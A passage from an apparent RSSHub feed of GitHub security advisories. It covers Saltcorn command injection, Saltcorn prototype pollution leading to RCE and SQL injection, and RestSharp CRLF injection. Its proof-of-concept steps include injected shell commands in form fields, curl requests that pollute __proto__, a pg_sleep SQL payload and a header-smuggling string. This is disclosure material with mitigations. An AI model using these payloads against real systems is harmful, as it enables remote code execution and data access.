<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempDir</span> <span class="pl-c1">=</span> <span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span><span class="pl-kos">,</span> <span class="pl-s">"temp_install"</span><span class="pl-kos">,</span> ...<span class="pl-s1">tokens</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [6] </span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span>
<span class="pl-k">async</span> <span class="pl-en">install</span><span class="pl-kos">(</span><span class="pl-s1">force</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-k">await</span> <span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-en">prepPluginsFolder</span><span class="pl-kos">(</span><span class="pl-s1">force</span><span class="pl-kos">,</span> <span class="pl-s1">pckJSON</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-c">// [8] </span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span>
<span class="pl-en">async</span> <span class="pl-s1">prepPluginsFolder</span><span class="pl-kos">(</span><span class="pl-s1">force</span><span class="pl-kos">,</span> <span class="pl-s1">pckJSON</span><span class="pl-kos">)</span><span class="pl-kos"></span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-k">switch</span> <span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">plugin</span><span class="pl-kos">.</span><span class="pl-c1">source</span><span class="pl-kos">)</span> <span class="pl-kos">{</span><span class="pl-kos"></span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-s1">case</span><span class="pl-kos"></span> <span class="pl-s">"git"</span>:
<span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">force</span> <span class="pl-c1">||</span> <span class="pl-c1">!</span><span class="pl-kos">(</span><span class="pl-k">await</span> <span class="pl-en">pathExists</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">pluginDir</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>
<span class="pl-k">await</span> <span class="pl-en">gitPullOrClone</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">plugin</span><span class="pl-kos">,</span> <span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempDir</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [9] </span>
<span class="pl-kos">[</span>...<span class="pl-s1"></span><span class="pl-kos">]</span>
<span class="pl-kos">}</span><span class="pl-kos"></span><span class="pl-kos"></span><span class="pl-kos"></span></pre></div>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">const</span> <span class="pl-en">gitPullOrClone</span> <span class="pl-c1">=</span> <span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">plugin</span><span class="pl-kos">,</span> <span class="pl-s1">pluginDir</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">fs</span><span class="pl-kos">.</span><span class="pl-en">existsSync</span><span class="pl-kos">(</span><span class="pl-s1">pluginDir</span><span class="pl-kos">)</span><span class="pl-kos">)</span> <span class="pl-kos">{</span>
<span class="pl-en">execSync</span><span class="pl-kos">(</span><span class="pl-s">`git <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">setKey</span><span class="pl-kos">}</span></span> -C <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">pluginDir</span><span class="pl-kos">}</span></span> pull`</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span> <span class="pl-k">else</span> <span class="pl-kos">{</span>
<span class="pl-en">execSync</span><span class="pl-kos">(</span><span class="pl-s">`git <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">setKey</span><span class="pl-kos">}</span></span> clone <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">plugin</span><span class="pl-kos">.</span><span class="pl-c1">location</span><span class="pl-kos">}</span></span> <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">pluginDir</span><span class="pl-kos">}</span></span>`</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [10] </span>
<span class="pl-kos">}</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span><span class="pl-kos">;</span></pre></div>
<h3>PoC</h3>
<ul>
<li>check that the file will be created by the command <code class="notranslate">echo "hello"&gt;/tmp/HACKED</code> does not exists:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/HACKED
cat: /tmp/HACKED: No such file or directory
</code></pre>
<ul>
<li>login with an admin account</li>
<li>visit <code class="notranslate">http://localhost:3000/plugins/new</code></li>
<li>enter the following fields:
<ul>
<li>Name: <code class="notranslate">;echo "hello"&gt;/tmp/HACKED</code></li>
<li>Source: <code class="notranslate">git</code></li>
<li>other fields blank</li>
</ul>
</li>
<li>click <code class="notranslate">Create</code></li>
<li>you will get an error saying <code class="notranslate">ENOENT: no such file or directory, ....</code> but the command <code class="notranslate">touch /tmp/HACKED</code> will be executed</li>
<li>to verify:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/HACKED
hello
</code></pre>
<h3>Impact</h3>
<p>Remote code execution</p>
<h3>Recommended Mitigation</h3>
<p>Sanitize the <code class="notranslate">pluginDir</code> value before passing to <code class="notranslate">execSync</code>. Alternatively, use <code class="notranslate">child_process. execFileSync</code> API (docs: <a href="https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options" rel="nofollow">https://nodejs.org/api/child_process.html#child_processexecfilesyncfile-args-options</a>)</p>
<h3>References</h3>
<ul>
<li><a title="GHSA-fm76-w8jw-xf8m" href="https://github.com/saltcorn/saltcorn/security/advisories/GHSA-fm76-w8jw-xf8m">GHSA-fm76-w8jw-xf8m</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/saltcorn/saltcorn/commit/024f19a7e079913f62f4a2335ab04116ddb68192/hovercard" href="https://github.com/saltcorn/saltcorn/commit/024f19a7e079913f62f4a2335ab04116ddb68192">saltcorn/saltcorn@<tt>024f19a</tt></a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/download_utils.js#L112</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65</a></li>
<li><a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-fm76-w8jw-xf8m</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-fm76-w8jw-xf8m</guid>
<pubDate>Thu, 03 Oct 2024 22:21:24 GMT</pubDate>
</item>
<item>
<title>@saltcorn/server Remote Code Execution (RCE) / SQL injection via prototype pollution by manipulating `lang` and `defstring` parameters when setting lo...</title>
<description><h3>Summary</h3>
<p>The endpoint <code class="notranslate">/site-structure/localizer/save-string/:lang/:defstring</code> accepts two parameter values: <code class="notranslate">lang</code> and <code class="notranslate">defstring</code>. These values are used in an unsafe way to set the keys and value of the <code class="notranslate">cfgStrings</code> object. It allows to add/modify properties of the <code class="notranslate">Object prototype</code> that result in several logic issues, including:</p>
<ul>
<li>RCE vulnerabilities by polluting the <code class="notranslate">tempRootFolder</code> property</li>
<li>SQL injection vulnerabilities by polluting the <code class="notranslate">schema</code> property when using <code class="notranslate">PostgreSQL</code> database.</li>
</ul>
<h3>Details</h3>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/infoarch.js#L236-L239</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-s1">router</span><span class="pl-kos">.</span><span class="pl-en">post</span><span class="pl-kos">(</span>
<span class="pl-s">"/localizer/save-string/:lang/:defstring"</span><span class="pl-kos">,</span>
<span class="pl-s1">isAdmin</span><span class="pl-kos">,</span>
<span class="pl-en">error_catcher</span><span class="pl-kos">(</span><span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">,</span> <span class="pl-s1">res</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
<span class="pl-k">const</span> <span class="pl-kos">{</span> lang<span class="pl-kos">,</span> defstring <span class="pl-kos">}</span> <span class="pl-c1">=</span> <span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">params</span><span class="pl-kos">;</span> <span class="pl-c">// source</span>
<span class="pl-k">const</span> <span class="pl-s1">cfgStrings</span> <span class="pl-c1">=</span> <span class="pl-en">getState</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">getConfigCopy</span><span class="pl-kos">(</span><span class="pl-s">"localizer_strings"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">cfgStrings</span><span class="pl-kos">[</span><span class="pl-s1">lang</span><span class="pl-kos">]</span><span class="pl-kos">)</span> <span class="pl-s1">cfgStrings</span><span class="pl-kos">[</span><span class="pl-s1">lang</span><span class="pl-kos">]</span><span class="pl-kos">[</span><span class="pl-s1">defstring</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-en">text</span><span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">body</span><span class="pl-kos">.</span><span class="pl-c1">value</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [1] sink</span>
<span class="pl-k">else</span> <span class="pl-s1">cfgStrings</span><span class="pl-kos">[</span><span class="pl-s1">lang</span><span class="pl-kos">]</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span> <span class="pl-kos">[</span><span class="pl-s1">defstring</span><span class="pl-kos">]</span>: <span class="pl-en">text</span><span class="pl-kos">(</span><span class="pl-s1">req</span><span class="pl-kos">.</span><span class="pl-c1">body</span><span class="pl-kos">.</span><span class="pl-c1">value</span><span class="pl-kos">)</span> <span class="pl-kos">}</span><span class="pl-kos">;</span>
<span class="pl-k">await</span> <span class="pl-en">getState</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">setConfig</span><span class="pl-kos">(</span><span class="pl-s">"localizer_strings"</span><span class="pl-kos">,</span> <span class="pl-s1">cfgStrings</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">res</span><span class="pl-kos">.</span><span class="pl-en">redirect</span><span class="pl-kos">(</span><span class="pl-s">`/site-structure/localizer/edit/<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">lang</span><span class="pl-kos">}</span></span>`</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span>
<span class="pl-kos">)</span><span class="pl-kos">;</span></pre></div>
<h3>PoC</h3>
<p>Setup:</p>
<ul>
<li>set <code class="notranslate">SALTCORN_NWORKERS=1</code> before starting the <code class="notranslate">saltcorn</code> server (to easily observe the behavior of the PoC)</li>
</ul>
<pre class="notranslate"><code class="notranslate">SALTCORN_NWORKERS=1 saltcorn serve
</code></pre>
<ul>
<li>make sure to use PostgresSQL backend</li>
<li>login with a user with admin permission</li>
</ul>
<h4>RCE</h4>
<p>This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain command executed.</p>
<ul>
<li>check that the file that will be created does not exists:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/RCE
cat: /tmp/RCE: No such file or directory
</code></pre>
<ul>
<li>pollute the <code class="notranslate">Object.prototype</code> with a <code class="notranslate">tempRootFolder</code> value set to <code class="notranslate">;echo+"rce"|tee+/tmp/RCE;</code> by sending the following request *** :</li>
</ul>
<div class="highlight highlight-source-shell"><pre class="notranslate">curl -i -X <span class="pl-s"><span class="pl-pds">$'</span>POST<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Host: localhost:3000<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Content-Type: application/x-www-form-urlencoded; charset=UTF-8<span class="pl-pds">'</span></span> -H <span class="pl-s"><span class="pl-pds">$'</span>Accept: */*<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Origin: http://localhost:3000<span class="pl-pds">'</span></span> \
-H <span class="pl-s"><span class="pl-pds">$'</span>Connection: close<span class="pl-pds">'</span></span> \
-b <span class="pl-s"><span class="pl-pds">$'</span>loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE<span class="pl-pds">'</span></span> \
--data-binary <span class="pl-s"><span class="pl-pds">$'</span>_csrf=VALID_csrf_Value&amp;value=;echo+"rce"|tee+/tmp/RCE;<span class="pl-pds">'</span></span> \
<span class="pl-s"><span class="pl-pds">$'</span>http://localhost:3000/site-structure/localizer/save-string/__proto__/tempRootFolder<span class="pl-pds">'</span></span></pre></div>
<p>visit <code class="notranslate">http://localhost:3000/plugins/new</code></p>
<ul>
<li>enter the following fields:
<ul>
<li>Name: <code class="notranslate">test</code></li>
<li>Source: <code class="notranslate">git</code></li>
<li>other fields blank</li>
<li>click <code class="notranslate">Create</code></li>
</ul>
</li>
<li>you will get an error but the command <code class="notranslate">echo "rce" | tee /tmp/RCE</code> will be executed</li>
<li>to verify:</li>
</ul>
<pre class="notranslate"><code class="notranslate">cat /tmp/RCE
rce
</code></pre>
<p>The RCE occurs because after the previous curl request, the <code class="notranslate">tempRootFolder</code> property is set to <code class="notranslate">;echo+"rce"|tee+/tmp/RCE;</code> that is later used to build the shell commands.</p>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L45-L58</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">class</span> <span class="pl-v">PluginInstaller</span> <span class="pl-kos">{</span>
<span class="pl-en">constructor</span><span class="pl-kos">(</span><span class="pl-s1">plugin</span><span class="pl-kos">,</span> <span class="pl-s1">opts</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-c">// opts will have the tempRootFolder property set with dangerous values // [2]</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span> <span class="pl-c1">=</span>
<span class="pl-s1">opts</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span> <span class="pl-c1">||</span> <span class="pl-en">envPaths</span><span class="pl-kos">(</span><span class="pl-s">"saltcorn"</span><span class="pl-kos">,</span> <span class="pl-kos">{</span> <span class="pl-c1">suffix</span>: <span class="pl-s">"tmp"</span> <span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-c1">temp</span><span class="pl-kos">;</span> <span class="pl-c">// [3]</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">pckJsonPath</span> <span class="pl-c1">=</span> <span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">pluginDir</span><span class="pl-kos">,</span> <span class="pl-s">"package.json"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempDir</span> <span class="pl-c1">=</span> <span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-smi">this</span><span class="pl-kos">.</span><span class="pl-c1">tempRootFolder</span><span class="pl-kos">,</span> <span class="pl-s">"temp_install"</span><span class="pl-kos">,</span> ...<span class="pl-s1">tokens</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [4]</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span>
<span class="pl-kos">[</span>...<span class="pl-kos">]</span>
<span class="pl-kos">}</span></pre></div>
<h4>SQL Injection</h4>
<p>This PoC demonstrates how to escalate the Prototype Pollution vulnerability to change the behavior of certain SQL queries (i.e SQLi).</p>
<ul>
<li>visit <code class="notranslate">http://localhost:3000/table</code> to check the page returns some results (no errors)</li>
<li>pollute the <code class="notranslate">Object.prototype</code> with a schema value set to <code class="notranslate">"</code> (just to create an exception in the query that will be executed to demonstrate the issue) by sending the following request *** :</li>
</ul>
<pre class="notranslate"><code class="notranslate">curl -i -X $'POST' \
-H $'Host: localhost:3000' \
-H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' \
-H $'Origin: http://localhost:3000' \
-H $'Connection: close' \
-b $'loggedin=true; connect.sid=VALID_CONNECT_SID_COOKIE' \
--data-binary $'_csrf=VALID_csrf_Value&amp;value=\"' \
$'http://localhost:3000/site-structure/localizer/save-string/__proto__/schema'
</code></pre>
<ul>
<li>visit again <code class="notranslate">http://localhost:3000/table</code> but this time an SQL error will appear:</li>
</ul>
<pre class="notranslate"><code class="notranslate">syntax error at or near "" order by lower(""
</code></pre>
<p><strong>NOTE</strong>: Another payload to use as <code class="notranslate">value</code> could be <code class="notranslate">pg_user"+WHERE+1=1+AND+(SELECT+pg_sleep(5))+IS+NOT+NULL+--</code></p>
<p>The SQL injection occurs because after the previous curl request, the <code class="notranslate">schema</code> property is set to <code class="notranslate">"</code>.</p>
<ul>
<li>file: <a href="https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101">https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/postgres/postgres.js#L101</a></li>
</ul>
<div class="highlight highlight-source-js"><pre class="notranslate"><span class="pl-k">const</span> <span class="pl-en">select</span> <span class="pl-c1">=</span> <span class="pl-k">async</span> <span class="pl-kos">(</span><span class="pl-s1">tbl</span><span class="pl-kos">,</span> <span class="pl-s1">whereObj</span><span class="pl-kos">,</span> <span class="pl-s1">selectopts</span> <span class="pl-c1">=</span> <span class="pl-kos">{</span><span class="pl-kos">}</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span> <span class="pl-c">// [2] selectopts</span>
<span class="pl-k">const</span> <span class="pl-kos">{</span> where<span class="pl-kos">,</span> values <span class="pl-kos">}</span> <span class="pl-c1">=</span> <span class="pl-en">mkWhere</span><span class="pl-kos">(</span><span class="pl-s1">whereObj</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">const</span> <span class="pl-s1">schema</span> <span class="pl-c1">=</span> <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">schema</span> <span class="pl-c1">||</span> <span class="pl-en">getTenantSchema</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-c">// [3] selectopts.schema</span>
<span class="pl-k">const</span> <span class="pl-s1">sql</span> <span class="pl-c1">=</span> <span class="pl-s">`SELECT <span class="pl-s1"><span class="pl-kos">${</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">fields</span> ? <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">fields</span><span class="pl-kos">.</span><span class="pl-en">join</span><span class="pl-kos">(</span><span class="pl-s">", "</span><span class="pl-kos">)</span> : <span class="pl-s">`*`</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-kos">}</span></span> FROM "<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">schema</span><span class="pl-kos">}</span></span>"."<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-en">sqlsanitize</span><span class="pl-kos">(</span><span class="pl-s1">tbl</span><span class="pl-kos">)</span><span class="pl-kos">}</span></span>" <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-s1">where</span><span class="pl-kos">}</span></span> <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-en">mkSelectOptions</span><span class="pl-kos">(</span> <span class="pl-c">// [4] schema</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-s1">selectopts</span><span class="pl-kos">,</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-s1">values</span><span class="pl-kos">,</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-c1">false</span></span></span>
<span class="pl-s"><span class="pl-s1"> <span class="pl-kos">)</span><span class="pl-kos">}</span></span>`</span><span class="pl-kos">;</span>
<span class="pl-en">sql_log</span><span class="pl-kos">(</span><span class="pl-s1">sql</span><span class="pl-kos">,</span> <span class="pl-s1">values</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">const</span> <span class="pl-s1">tq</span> <span class="pl-c1">=</span> <span class="pl-k">await</span> <span class="pl-kos">(</span><span class="pl-s1">client</span> <span class="pl-c1">||</span> <span class="pl-s1">selectopts</span><span class="pl-kos">.</span><span class="pl-c1">client</span> <span class="pl-c1">||</span> <span class="pl-s1">pool</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">query</span><span class="pl-kos">(</span><span class="pl-s1">sql</span><span class="pl-kos">,</span> <span class="pl-s1">values</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-k">return</span> <span class="pl-s1">tq</span><span class="pl-kos">.</span><span class="pl-c1">rows</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span><span class="pl-kos">;</span></pre></div>
<p>*** Retrieve valid values for the <code class="notranslate">connect.sid</code> (<code class="notranslate">VALID_CONNECT_SID_COOKIE</code>) and <code class="notranslate">_csrf</code> values (<code class="notranslate">VALID_csrf_Value</code>) :</p>
<ul>
<li>open the browser developer console and go to the <code class="notranslate">Network</code> tab</li>
<li>visit <code class="notranslate">http://localhost:3000/site-structure/localizer/add-lang</code></li>
<li>add a language (<code class="notranslate">Name: test</code> , <code class="notranslate">Locale: test</code>) and click <code class="notranslate">Save</code></li>
<li>under the <code class="notranslate">Network</code> tab, filter for <code class="notranslate">save-lang</code> and check the request parameters (<code class="notranslate">Headers</code> and <code class="notranslate">Payload</code>/<code class="notranslate&... |
http://localhost:1200/github/advisor/data/reviewed/nuget - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - nuget - reviewed</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github/advisor/data/reviewed/nuget" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - nuget - reviewed - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Sat, 05 Oct 2024 18:31:14 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>CRLF Injection in RestSharp's `RestRequest.AddHeader` method</title>
<description><h3>Summary</h3>
<p>The second argument to <code class="notranslate">RestRequest.AddHeader</code> (the header value) is vulnerable to CRLF injection. The same applies to <code class="notranslate">RestRequest.AddOrUpdateHeader</code> and <code class="notranslate">RestClient.AddDefaultHeader</code>.</p>
<h3>Details</h3>
<p>The way HTTP headers are added to a request is via the <code class="notranslate">HttpHeaders.TryAddWithoutValidation</code> method: <a href="https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32">https://github.com/restsharp/RestSharp/blob/777bf194ec2d14271e7807cc704e73ec18fcaf7e/src/RestSharp/Request/HttpRequestMessageExtensions.cs#L32</a> This method does not check for CRLF characters in the header value.</p>
<p>This means that any headers from a <code class="notranslate">RestSharp.RequestHeaders</code> object are added to the request in such a way that they are vulnerable to CRLF-injection. In general, CRLF-injection into a HTTP header (when using HTTP/1.1) means that one can inject additional HTTP headers or smuggle whole HTTP requests.</p>
<h3>PoC</h3>
<p>The below example code creates a console app that takes one command line variable "api key" and then makes a request to some status page with the provided key inserted in the "Authorization" header:</p>
<div class="highlight highlight-source-cs"><pre class="notranslate"><span class="pl-k">using</span> RestSharp<span class="pl-kos">;</span>
<span class="pl-k">class</span> <span class="pl-smi">Program</span>
<span class="pl-kos">{</span>
<span class="pl-k"><span class="pl-k">static</span></span> <span class="pl-k">async</span> Task <span class="pl-en">Main</span><span class="pl-kos">(</span><span class="pl-smi">string</span><span class="pl-kos">[</span><span class="pl-kos">]</span> <span class="pl-s1">args</span><span class="pl-kos">)</span>
<span class="pl-kos">{</span>
<span class="pl-c">// Usage: dotnet run &lt;api key&gt;</span>
<span class="pl-smi">var</span> <span class="pl-s1">key</span> <span class="pl-c1">=</span> args<span class="pl-kos">[</span><span class="pl-c1">0</span><span class="pl-kos">]</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">options</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> RestClientOptions<span class="pl-kos">(</span><span class="pl-s"><span class="pl-s">"</span>http://insert.some.site.here<span class="pl-s">"</span></span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">client</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> RestClient<span class="pl-kos">(</span>options<span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">request</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> RestRequest<span class="pl-kos">(</span><span class="pl-s"><span class="pl-s">"</span>/status<span class="pl-s">"</span></span><span class="pl-kos">,</span> Method<span class="pl-kos">.</span>Get<span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">AddHeader</span><span class="pl-kos">(</span><span class="pl-s"><span class="pl-s">"</span>Authorization<span class="pl-s">"</span></span><span class="pl-kos">,</span> key<span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-smi">var</span> <span class="pl-s1">response</span> <span class="pl-c1">=</span> <span class="pl-k">await</span> client<span class="pl-kos">.</span><span class="pl-en">ExecuteAsync</span><span class="pl-kos">(</span>request<span class="pl-kos">)</span><span class="pl-kos">;</span>
Console<span class="pl-kos">.</span><span class="pl-en">WriteLine</span><span class="pl-kos">(</span><span class="pl-s">$"</span><span class="pl-s">Status: </span><span class="pl-kos">{</span>response<span class="pl-kos">.</span>StatusCode<span class="pl-kos">}</span><span class="pl-s">"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
Console<span class="pl-kos">.</span><span class="pl-en">WriteLine</span><span class="pl-kos">(</span><span class="pl-s">$"</span><span class="pl-s">Response: </span><span class="pl-kos">{</span>response<span class="pl-kos">.</span>Content<span class="pl-kos">}</span><span class="pl-s">"</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-kos">}</span>
<span class="pl-kos">}</span></pre></div>
<p>This application is now vulnerable to CRLF-injection, and can thus be abused to for example perform request splitting and thus server side request forgery (SSRF):</p>
<div class="highlight highlight-source-shell"><pre class="notranslate">anonymous@ubuntu-sofia-672448:<span class="pl-k">~</span>$ dotnet RestSharp-cli.dll <span class="pl-s"><span class="pl-pds">$'</span>test<span class="pl-cce">\r\n</span>User-Agent: injected header!<span class="pl-cce">\r\n\r\n</span>GET /smuggled HTTP/1.1<span class="pl-cce">\r\n</span>Host: insert.some.site.here<span class="pl-pds">'</span></span>
Status: OK
Response: <span class="pl-k">&lt;</span>html&gt;&lt;/html<span class="pl-k">&gt;</span></pre></div>
<p>The application intends to send a single request of the form:</p>
<div class="highlight highlight-source-httpspec"><pre class="notranslate"><span class="pl-k">GET</span><span class="pl-c1"> /status HTTP/1.1</span>
<span class="pl-s"><span class="pl-v">Host:</span> insert.some.site.here</span>
<span class="pl-s"><span class="pl-v">Authorization:</span> &lt;api key&gt;</span>
<span class="pl-s"><span class="pl-v">User-Agent:</span> RestSharp/111.4.1.0</span>
